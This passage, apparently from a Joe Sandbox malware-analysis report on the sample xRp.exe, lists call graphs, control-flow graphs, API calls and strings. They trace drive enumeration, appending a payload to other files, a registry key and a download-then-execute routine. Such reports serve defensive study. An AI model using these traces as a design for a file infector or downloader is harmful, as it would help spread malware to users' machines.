FindCloseChangeNotification 1125 4e1a96 1123->1125 1125->1116 1131 4e1ab8 VirtualFree 1125->1131 1126 4e19da wsprintfA 1130 4e1a06 1126->1130 1127 4e1a59 ReadFile 1127->1128 1127->1129 1128->1123 1128->1125 1129->1127 1129->1128 1130->1118 1132 4e1a9e 1130->1132 1131->1116 1132->1125 1133->1126 1135 4e2bc8 1134->1135 1136 4e2c09 WaitForMultipleObjects 1134->1136 1139 4e2bfa lstrlen 1135->1139 1140 4e2bd2 GetDriveTypeA 1135->1140 1141 4e2be3 CreateThread 1135->1141 1137 4e2c3c 1136->1137 1138 4e2c2a CreateThread 1136->1138 1138->1137 1145 4e2845 1138->1145 1139->1135 1139->1136 1140->1135 1140->1139 1141->1139 1142 4e2b7d 1141->1142 1155 4e29e2 memset wsprintfA 1142->1155 1294 4e274a memset memset SHGetSpecialFolderPathA wsprintfA 1145->1294 1147 4e2878 1149 4e288c VirtualFree 1147->1149 1150 4e289a 1147->1150 1148 4e2692 8 API calls 1151 4e2853 1148->1151 1149->1150 1152 4e28ab 1150->1152 1153 4e28a4 CloseHandle 1150->1153 1151->1147 1151->1148 1154 4e239d 176 API calls 1151->1154 1153->1152 1154->1151 1156 4e2abc memset memset FindFirstFileA 1155->1156 1157 4e2a3a memset lstrlen lstrcpyn strrchr 1155->1157 1169 4e28b8 memset wsprintfA 1156->1169 1157->1156 1158 4e2a88 1157->1158 1158->1156 1160 4e2a9a lstrcmpiA 1158->1160 1162 4e2aad lstrlen 1160->1162 1163 4e2b74 1160->1163 1162->1156 1162->1160 1164 4e2b61 FindNextFileA 1165 4e2b6d FindClose 1164->1165 1166 4e2b23 1164->1166 1165->1163 1167 4e2b35 lstrcmpiA 1166->1167 1168 4e28b8 163 API calls 1166->1168 1167->1165 1167->1166 1168->1164 1170 4e2951 memset 1169->1170 1171 4e2905 1169->1171 1170->1164 1171->1170 1172 4e291b memset wsprintfA 1171->1172 1173 4e2956 strrchr 1171->1173 1174 4e29e2 169 API calls 1172->1174 1173->1170 1175 4e2967 lstrcmpiA 1173->1175 1174->1170 1176 4e297a 1175->1176 1177 4e2988 lstrcmpiA 1175->1177 1187 4e1e6e 1176->1187 1177->1170 1180 4e2994 1177->1180 1179 4e29ad strstr 1181 4e29cb 1179->1181 1182 4e29d3 1179->1182 1180->1179 1183 4e29a5 lstrcpy 1180->1183 1230 4e239d strstr 1181->1230 1253 4e2692 1182->1253 1183->1179 1189 4e1e7d 1187->1189 1262 4e1df6 strrchr 1189->1262 1191 4e2332 1195 4e233d UnmapViewOfFile 1191->1195 1196 4e2346 1191->1196 1192 4e1eb0 SetFileAttributesA CreateFileA 1192->1191 1193 4e1edf 1192->1193 1267 4e1915 1193->1267 1195->1196 1198 4e234b FindCloseChangeNotification 1196->1198 1199 4e2350 1196->1199 1198->1199 1200 4e2356 CloseHandle 1199->1200 1201 4e2391 1199->1201 1200->1201 1201->1170 1202 4e1f2e 1202->1191 1273 4e1c81 1202->1273 1206 4e1f92 1207 4e1c81 2 API calls 1206->1207 1208 4e1f9f 1207->1208 1208->1191 1209 4e1af9 158 API calls 1208->1209 1210 4e2024 1208->1210 1214 4e1fc0 1209->1214 1210->1191 1211 4e1af9 158 API calls 1210->1211 1212 4e207a 1211->1212 1213 4e1af9 158 API calls 1212->1213 1218 4e2090 1213->1218 1214->1191 1214->1210 1215 4e1af9 158 API calls 1214->1215 1216 4e1ffe 1215->1216 1217 4e2013 FlushViewOfFile 1216->1217 1217->1210 1219 4e20bb memset memset 1218->1219 1220 4e20f5 1219->1220 1221 4e1c81 2 API calls 1220->1221 1223 4e21de 1221->1223 1222 4e2226 memcpy UnmapViewOfFile CloseHandle 1278 4e1b8a 1222->1278 1223->1222 1225 4e226e 1286 4e185b GetSystemTimeAsFileTime srand rand srand rand 1225->1286 1227 4e22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1228 4e1915 3 API calls 1227->1228 1229 4e231f CloseHandle 1228->1229 1229->1191 1234 4e23d8 1230->1234 1231 4e246a GetFileSize 1232 4e2675 CloseHandle 1231->1232 1235 4e2480 1231->1235 1233 4e267c RemoveDirectoryA 1232->1233 1236 4e2687 1233->1236 1234->1231 1234->1236 1235->1232 1237 4e2499 1235->1237 1236->1170 1238 4e1915 3 API calls 1237->1238 1239 4e24a4 9 API calls 1238->1239 1288 4e189d memset 1239->1288 1242 4e255c Sleep memset wsprintfA 1243 4e29e2 154 API calls 1242->1243 1244 4e2597 memset wsprintfA Sleep 1243->1244 1245 4e189d 5 API calls 1244->1245 1246 4e25e4 Sleep 1245->1246 1247 4e2602 1246->1247 1248 4e1915 3 API calls 1247->1248 1249 4e2610 CloseHandle 1248->1249 1249->1233 1250 4e261e 1249->1250 1250->1233 1251 4e2641 SetFilePointer WriteFile 1250->1251 1251->1233 1252 4e2667 SetEndOfFile 1251->1252 1252->1233 1254 4e26b2 WaitForSingleObject 1253->1254 1255 4e26a2 CreateEventA 1253->1255 1256 4e2708 1254->1256 1257 4e26c1 lstrlen ??2@YAPAXI 1254->1257 1255->1254 1258 4e2736 SetEvent 1256->1258 1260 4e2718 lstrcpy ??3@YAXPAX 1256->1260 1257->1258 1259 4e26da lstrcpy 1257->1259 1258->1170 1261 4e26f1 1259->1261 1260->1261 1261->1258 1263 4e1e62 1262->1263 1264 4e1e13 lstrcpy strrchr 1262->1264 1263->1191 1263->1192 1264->1263 1265 4e1e40 lstrcmpiA 1264->1265 1265->1263 1266 4e1e52 lstrlen 1265->1266 1266->1263 1266->1265 1268 4e1928 1267->1268 1271 4e1924 SetFilePointer CreateFileMappingA MapViewOfFile 1267->1271 1269 4e192e memset GetFileTime 1268->1269 1270 4e194f 1268->1270 1269->1271 1270->1271 1272 4e1954 SetFileTime 1270->1272 1271->1191 1271->1202 1272->1271 1274 4e1c9c 1273->1274 1276 4e1c94 1273->1276 1275 4e1cae memset memset 1274->1275 1274->1276 1275->1276 1276->1191 1277 4e185b GetSystemTimeAsFileTime srand rand srand rand 1276->1277 1277->1206 1279 4e1b93 1278->1279 1287 4e185b GetSystemTimeAsFileTime srand rand srand rand 1279->1287 1281 4e1bca srand 1282 4e1bd8 rand 1281->1282 1283 4e1c08 1282->1283 1283->1282 1284 4e1c29 memset memcpy lstrcat 1283->1284 1284->1225 1286->1227 1287->1281 1289 4e18d9 1288->1289 1290 4e190c 1289->1290 1291 4e18e0 CloseHandle WaitForSingleObject 1289->1291 1290->1233 1290->1242 1292 4e18fb GetExitCodeProcess 1291->1292 1293 4e1907 CloseHandle 1291->1293 1292->1293 1293->1290 1301 4e185b GetSystemTimeAsFileTime srand rand srand rand 1294->1301 1296 4e27b5 wsprintfA 1297 4e27da 1296->1297 1298 4e27de wsprintfA 1297->1298 1300 4e280f 1297->1300 1299 4e1973 14 API calls 1298->1299 1299->1300 1300->1151 1301->1296 1303 4e11c6 AdjustTokenPrivileges 1302->1303 1304 4e1200 CloseHandle 1302->1304 1305 4e11f6 1303->1305 1306 4e11f7 CloseHandle 1303->1306 1304->1090 1305->1306 1306->1304 1308 4e123f GetCurrentProcessId OpenProcess 1307->1308 1309 4e1310 1307->1309 1308->1309 1311 4e1262 1308->1311 1309->1088 1316 4e1319 1309->1316 1310 4e12b0 VirtualAlloc 1310->1311 1315 4e12b8 1310->1315 1311->1310 1312 4e12f1 CloseHandle 1311->1312 1314 4e1296 VirtualFree 1311->1314 1311->1315 1312->1309 1313 4e1302 VirtualFree 1312->1313 1313->1309 1314->1310 1315->1312 1317 4e134a 1316->1317 1318 4e132a GetModuleHandleA 6CC16DE0 1316->1318 1319 4e1363 1317->1319 1320 4e1351 memset 1317->1320 1318->1317 1318->1319 1319->1088 1319->1096 1320->1319 1321->1109 1323 4e10ba 1322->1323 1324 4e1196 1322->1324 1323->1324 1340 4e185b GetSystemTimeAsFileTime srand rand srand rand 1323->1340 1326 4e1118 wsprintfA wsprintfA URLDownloadToFileA 1327 4e10dc 1326->1327 1328 4e1168 lstrlen Sleep 1326->1328 1331 4e1000 CreateFileA 1327->1331 1328->1323 1332 4e1025 GetFileSize CreateFileMappingA MapViewOfFile 1331->1332 1333 4e1092 WinExec lstrlen 1331->1333 1334 4e107b 1332->1334 1335 4e1057 1332->1335 1333->1323 1333->1324 1338 4e108d CloseHandle 1334->1338 1339 4e1087 CloseHandle 1334->1339 1336 4e1074 UnmapViewOfFile 1335->1336 1337 4e1061 1335->1337 1336->1334 1337->1336 1338->1333 1339->1338 1340->1326 1359 4e2361 1360 4e236b UnmapViewOfFile 1359->1360 1361 4e2374 1359->1361 1360->1361 1362 4e2379 CloseHandle 1361->1362 1363 4e2382 1361->1363 1362->1363 1364 4e2388 CloseHandle 1363->1364 1365 4e2391 1363->1365 1364->1365

                                      Callgraph

                                      • Executed
                                      • Not Executed
                                      • Opacity -> Relevance
                                      • Disassembly available
                                      callgraph 0 Function_004E274A 5 Function_004E185B 0->5 21 Function_004E1973 0->21 1 Function_004E66C8 29 Function_004E6A84 1->29 30 Function_004E6B02 1->30 32 Function_004E6D00 1->32 2 Function_004E2C48 2->21 25 Function_004E2B8C 2->25 3 Function_004E2845 3->0 38 Function_004E239D 3->38 46 Function_004E2692 3->46 4 Function_004E235D 6 Function_004E6159 6->1 7 Function_004E17D0 8 Function_004E1E6E 8->5 9 Function_004E1C68 8->9 12 Function_004E2D60 8->12 17 Function_004E1AF9 8->17 19 Function_004E1DF6 8->19 26 Function_004E1D8A 8->26 27 Function_004E1B8A 8->27 34 Function_004E1C81 8->34 40 Function_004E2D9B 8->40 45 Function_004E1915 8->45 10 Function_004E29E2 51 Function_004E28B8 10->51 11 Function_004E6B63 49 Function_004E67A4 11->49 52 Function_004E6834 11->52 54 Function_004E69B0 11->54 13 Function_004E14E1 13->17 50 Function_004E1638 13->50 14 Function_004E2361 14->40 15 Function_004E2B7D 15->10 16 Function_004E6CF8 17->50 18 Function_004E6076 18->1 20 Function_004E6CF2 20->16 21->5 22 Function_004E2CF0 23 Function_004E120E 24 Function_004E680F 25->3 25->15 27->5 28 Function_004E600A 29->20 29->24 30->11 31 Function_004E1000 31->7 32->11 32->20 32->54 33 Function_004E6001 33->28 35 Function_004E1581 35->5 36 Function_004E119F 37 Function_004E139F 37->23 37->36 43 Function_004E1319 37->43 38->10 39 Function_004E189D 38->39 38->45 41 Function_004E1718 41->22 42 Function_004E1099 42->5 42->31 44 Function_004E6014 47 Function_004E6012 48 Function_004E65A6 50->2 50->7 50->35 50->37 50->41 50->42 51->8 51->10 51->38 51->46 53 Function_004E6734 53->29 53->30 53->32

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 101 4e29e2-4e2a34 memset wsprintfA 102 4e2abc-4e2b21 memset * 2 FindFirstFileA call 4e28b8 memset 101->102 103 4e2a3a-4e2a86 memset lstrlen lstrcpyn strrchr 101->103 110 4e2b61-4e2b6b FindNextFileA 102->110 103->102 104 4e2a88-4e2a98 103->104 104->102 106 4e2a9a-4e2aa7 lstrcmpiA 104->106 108 4e2aad-4e2aba lstrlen 106->108 109 4e2b74-4e2b7a 106->109 108->102 108->106 111 4e2b6d-4e2b6e FindClose 110->111 112 4e2b23-4e2b2a 110->112 111->109 113 4e2b4c-4e2b5c call 4e28b8 112->113 114 4e2b2c-4e2b33 112->114 113->110 114->113 115 4e2b35-4e2b4a lstrcmpiA 114->115 115->111 115->113
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                      • String ID: %s*$C:\$Documents and Settings
                                      • API String ID: 2826467728-110786608
                                      • Opcode ID: 5836115e4bfaaeccee3530a58d9871314ef71d5b21ff30e7a0b480e0f251dfe7
                                      • Instruction ID: 2dc5d9ac8227808c5b5bec70d233ea198ce2e4fad8d826b281451d1ebcf7e33b
                                      • Opcode Fuzzy Hash: 5836115e4bfaaeccee3530a58d9871314ef71d5b21ff30e7a0b480e0f251dfe7
                                      • Instruction Fuzzy Hash: B54176B2804389AFD721DF91DD89DEB77ACEB84316F04093AF544C7111E678DA4887AA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 218 4e1718-4e1733 GetSystemTimeAsFileTime 219 4e1754-4e1758 218->219 220 4e1735-4e1752 SHSetValueA 218->220 221 4e175a-4e1784 SHGetValueA 219->221 222 4e17c6-4e17cd 219->222 220->222 221->222 223 4e1786-4e17b3 call 4e2cf0 * 2 221->223 223->222 228 4e17b5 223->228 229 4e17bf 228->229 230 4e17b7-4e17bd 228->230 229->222 230->222 230->229
                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E1729
                                      • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 004E174C
                                      • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 004E177C
                                      • __aulldiv.LIBCMT ref: 004E1796
                                      • __aulldiv.LIBCMT ref: 004E17A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: TimeValue__aulldiv$FileSystem
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$SOFTWARE\GTplus$Time
                                      • API String ID: 541852442-3211683193
                                      • Opcode ID: 632597f045288ac55cd79848b548fcd81ad7ebdb76084ac3eac0963d5a2e8c0f
                                      • Instruction ID: 6087e574c13ecec1e6e3a211f639aa2140a24b9b54c4a678f36e89bb4cd1a677
                                      • Opcode Fuzzy Hash: 632597f045288ac55cd79848b548fcd81ad7ebdb76084ac3eac0963d5a2e8c0f
                                      • Instruction Fuzzy Hash: 7311DA71940285BBDB108F91CCC9FEFBBBCEB04B16F204056F901A7141D6789A448B68

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 231 4e6076-4e6079 232 4e607b-4e6080 231->232 233 4e60e0-4e60eb 231->233 235 4e60f7-4e60f8 232->235 236 4e6082-4e6085 232->236 234 4e60ee-4e60f4 233->234 237 4e60f6 234->237 238 4e60fe-4e6106 235->238 239 4e60fa-4e60fc call 4e66c8 235->239 236->237 240 4e6087 236->240 237->235 242 4e6108-4e611d 238->242 243 4e6155-4e6189 VirtualFree 238->243 239->238 240->234 244 4e6089-4e6095 240->244 246 4e611f-4e6121 242->246 251 4e618c-4e6192 243->251 247 4e6097-4e609f 244->247 248 4e60a1-4e60aa 244->248 252 4e6123 246->252 253 4e6151-4e6154 246->253 247->248 249 4e61ba-4e61c8 248->249 250 4e60b0-4e60c1 VirtualAlloc 248->250 256 4e61ca-4e61d7 249->256 257 4e6243-4e6251 249->257 254 4e60c7-4e60cf 250->254 251->254 255 4e6198-4e61b0 VirtualFree 251->255 252->253 258 4e6125-4e6128 252->258 253->243 254->251 259 4e60d5-4e60df VirtualAlloc 254->259 255->249 262 4e61b2-4e61b4 255->262 263 4e61dd-4e61e0 256->263 260 4e6264-4e626f 257->260 261 4e6253 257->261 264 4e612a-4e612e 258->264 265 4e6134-4e613b 258->265 259->233 268 4e6271-4e6276 260->268 267 4e6255-4e6258 261->267 262->249 263->257 269 4e61e2-4e61f2 263->269 264->265 271 4e6130-4e6132 264->271 265->271 272 4e613d-4e614f 265->272 267->260 273 4e625a-4e6262 267->273 274 4e627c-4e6289 268->274 275 4e6389-4e63b1 VirtualProtect 268->275 276 4e61f5-4e61fe 269->276 271->246 272->246 273->267 289 4e628b 274->289 290 4e6292-4e6298 274->290 277 4e63b7-4e63ba 275->277 278 4e620c-4e6219 276->278 279 4e6200-4e6203 276->279 280 4e63fc-4e63ff VirtualProtect 277->280 281 4e63bc-4e63c2 277->281 282 4e6238-4e623f 278->282 284 4e621b-4e6228 279->284 285 4e6205-4e6208 279->285 288 4e6400-4e6416 280->288 281->281 287 4e63c4 281->287 282->276 286 4e6241 282->286 284->282 291 4e622a-4e6236 285->291 292 4e620a 285->292 286->263 287->280 294 4e63c6-4e63cf 287->294 295 4e6418-4e641d 288->295 296 4e6420-4e6425 288->296 289->290 293 4e62a2-4e62ac 290->293 291->282 292->282 297 4e62ae 293->297 298 4e62b1-4e62c8 293->298 299 4e63d4-4e63d8 294->299 300 4e63d1 294->300 297->298 301 4e62ce-4e62d4 298->301 302 4e6373-4e6384 298->302 303 4e63dd-4e63e1 299->303 304 4e63da 299->304 300->299 305 4e62da-4e62f1 301->305 306 4e62d6-4e62d9 301->306 302->268 307 4e63e7-4e63fa VirtualProtect 303->307 308 4e63e3 303->308 304->303 310 4e6365-4e636e 305->310 311 4e62f3-4e62f9 305->311 306->305 307->277 307->280 308->307 310->293 312 4e62fb-4e630f 311->312 313 4e6314-4e6326 311->313 314 4e6426-4e64a9 312->314 315 4e634c-4e6360 313->315 316 4e6328-4e634a 313->316 325 4e64ab-4e64c0 314->325 326 4e6519-4e651c 314->326 315->314 316->310 330 4e6535-4e6537 325->330 331 4e64c2 325->331 327 4e651d-4e651e 326->327 328 4e6583-4e6587 326->328 333 4e6522-4e6533 327->333 332 4e6588-4e658b 328->332 334 4e659a 330->334 335 4e6539 330->335 336 4e64f8 331->336 337 4e64c5-4e64cd 331->337 338 4e658d-4e658f 332->338 339 4e65a1-4e65a3 332->339 333->330 342 4e659b-4e659d 334->342 340 4e653b-4e6541 335->340 341 4e65b4 335->341 345 4e656c-4e656f 336->345 346 4e64fa-4e64fe 336->346 343 4e64cf-4e64d4 337->343 344 4e6542-4e6545 337->344 347 4e6591-4e6593 338->347 340->344 353 4e65be-4e65db 341->353 342->347 349 4e659f 342->349 350 4e64d6-4e64d9 343->350 351 4e6517-4e6518 343->351 352 4e654d-4e6550 344->352 354 4e6572 345->354 346->354 355 4e6500 346->355 347->342 348 4e6595 347->348 348->334 349->332 350->352 356 4e64db-4e64f5 350->356 351->326 352->353 357 4e6552-4e6556 352->357 358 4e65dd-4e65f6 353->358 359 4e6573-4e6576 354->359 355->333 360 4e6502 355->360 356->336 361 4e6578-4e657a 357->361 362 4e6558-4e6569 357->362 363 4e65f7-4e6608 358->363 359->361 360->359 364 4e6504-4e6513 360->364 361->358 365 4e657c 361->365 362->345 364->330 366 4e6515 364->366 365->363 367 4e657e-4e657f 365->367 366->351 367->328
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 004E60BE
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 004E60DF
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 004E6189
                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004E61A5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: bdd6c6c6ee817dc2397c291705eae79ab7702b2eb28f2ba843b8348c72fe178c
                                      • Instruction ID: 5978ddecb084c166188e7d1288606446a573098f7e3731ed3baee11b49d781d6
                                      • Opcode Fuzzy Hash: bdd6c6c6ee817dc2397c291705eae79ab7702b2eb28f2ba843b8348c72fe178c
                                      • Instruction Fuzzy Hash: 551266726087C49FDB328F25CC45BEA7BB0EF22351F1A059EDD858B293D238A901C759

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 368 4e2b8c-4e2bc6 memset GetLogicalDriveStringsA 369 4e2bc8-4e2bcc 368->369 370 4e2c09-4e2c28 WaitForMultipleObjects 368->370 373 4e2bce-4e2bd0 369->373 374 4e2bfa-4e2c07 lstrlen 369->374 371 4e2c3c-4e2c45 370->371 372 4e2c2a-4e2c3a CreateThread 370->372 372->371 373->374 375 4e2bd2-4e2bdc GetDriveTypeA 373->375 374->369 374->370 375->374 376 4e2bde-4e2be1 375->376 376->374 377 4e2be3-4e2bf6 CreateThread 376->377 377->374
                                      APIs
                                      • memset.MSVCRT ref: 004E2BA6
                                      • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 004E2BB4
                                      • GetDriveTypeA.KERNEL32(?), ref: 004E2BD3
                                      • CreateThread.KERNEL32(00000000,00000000,004E2B7D,?,00000000,00000000), ref: 004E2BEE
                                      • lstrlen.KERNEL32(?), ref: 004E2BFB
                                      • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 004E2C16
                                      • CreateThread.KERNEL32(00000000,00000000,004E2845,00000000,00000000,00000000), ref: 004E2C3A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                      • String ID:
                                      • API String ID: 1073171358-0
                                      • Opcode ID: 35d3bca3129d2a449bf60c4e0edf85fe24c48313eff82110ac51d0d7b9b9a917
                                      • Instruction ID: e101d3b60bc02551b3c7dac1be8e545733d9c9e0a7c9413f00f91c45a7c25646
                                      • Opcode Fuzzy Hash: 35d3bca3129d2a449bf60c4e0edf85fe24c48313eff82110ac51d0d7b9b9a917
                                      • Instruction Fuzzy Hash: D521D5B18001CCAFE7219F659C84EAF7B6DFB44346B24012AF85293152D7A89E06CB69

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4e1e6e-4e1e95 call 4e2d60 3 4e1e9c-4e1eaa call 4e1df6 0->3 4 4e1e97 call 4e1d8a 0->4 8 4e2332 3->8 9 4e1eb0-4e1ed9 SetFileAttributesA CreateFileA 3->9 4->3 11 4e2338-4e233b 8->11 9->8 10 4e1edf-4e1f28 call 4e1915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 18 4e1f2e-4e1f39 10->18 13 4e233d-4e2340 UnmapViewOfFile 11->13 14 4e2346-4e2349 11->14 13->14 16 4e234b-4e234e FindCloseChangeNotification 14->16 17 4e2350-4e2354 14->17 16->17 19 4e2356-4e235b CloseHandle 17->19 20 4e2391-4e239a call 4e2d9b 17->20 18->8 21 4e1f3f-4e1f56 18->21 19->20 21->8 23 4e1f5c-4e1f64 21->23 23->8 25 4e1f6a-4e1f70 23->25 25->8 26 4e1f76-4e1f87 call 4e1c81 25->26 26->8 29 4e1f8d-4e1fa7 call 4e185b call 4e1c81 26->29 29->8 34 4e1fad-4e1fb4 29->34 35 4e1fb6-4e1fc5 call 4e1af9 34->35 36 4e2024-4e2045 34->36 35->36 44 4e1fc7-4e1fd2 35->44 36->8 37 4e204b-4e204e 36->37 39 4e2070-4e20f4 call 4e1af9 * 2 call 4e1c68 * 2 memset * 2 37->39 40 4e2050-4e2053 37->40 62 4e20f5-4e20fe 39->62 42 4e2056-4e205a 40->42 42->39 45 4e205c-4e2061 42->45 44->8 47 4e1fd8-4e1fe7 44->47 45->8 48 4e2067-4e206e 45->48 50 4e1fef-4e2006 call 4e1af9 47->50 51 4e1fe9-4e1fec 47->51 48->42 57 4e2008-4e200e call 4e1c68 50->57 58 4e2013-4e201e FlushViewOfFile 50->58 51->50 57->58 58->36 63 4e2130-4e2139 62->63 64 4e2100-4e2114 62->64 67 4e213c-4e2142 63->67 65 4e212d-4e212e 64->65 66 4e2116-4e212a 64->66 65->62 66->65 68 4e215c 67->68 69 4e2144-4e2150 67->69 72 4e215f-4e2162 68->72 70 4e2157-4e215a 69->70 71 4e2152-4e2154 69->71 70->67 71->70 73 4e2164-4e2171 72->73 74 4e2181-4e2184 72->74 75 4e232a-4e232d 73->75 76 4e2177-4e217e 73->76 77 4e218d-4e21ba call 4e1c68 74->77 78 4e2186 74->78 75->72 76->74 81 4e21bc-4e21d0 call 4e1c68 77->81 82 4e21d3-4e220b call 4e1c81 call 4e1c68 77->82 78->77 81->82 89 4e220d-4e2218 call 4e1c68 82->89 90 4e221b-4e221e 82->90 89->90 92 4e2226-4e231a memcpy UnmapViewOfFile CloseHandle call 4e1b8a call 4e185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 4e1915 90->92 93 4e2220-4e2223 90->93 100 4e231f-4e2328 CloseHandle 92->100 93->92 100->11
                                      APIs
                                      • SetFileAttributesA.KERNEL32(?,00000080,?,004E32B0,00000164,004E2986,?), ref: 004E1EB9
                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 004E1ECD
                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 004E1EF3
                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 004E1F07
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 004E1F1D
                                      • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 004E201E
                                      • memset.MSVCRT ref: 004E20D8
                                      • memset.MSVCRT ref: 004E20EA
                                      • memcpy.MSVCRT ref: 004E222D
                                      • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E2238
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E224A
                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E22C6
                                      • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E22CB
                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E22DD
                                      • WriteFile.KERNEL32(000000FF,004E4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E22F7
                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E230D
                                      • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E2322
                                      • UnmapViewOfFile.KERNEL32(?,?,004E32B0,00000164,004E2986,?), ref: 004E2340
                                      • FindCloseChangeNotification.KERNEL32(?,?,004E32B0,00000164,004E2986,?), ref: 004E234E
                                      • CloseHandle.KERNEL32(000000FF,?,004E32B0,00000164,004E2986,?), ref: 004E2359
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: File$CloseView$HandlePointer$CreateUnmapWritememset$AttributesChangeFindFlushMappingNotificationmemcpy
                                      • String ID: .@N$5@N$<@N$C@N$m@N
                                      • API String ID: 1893444929-2873707592
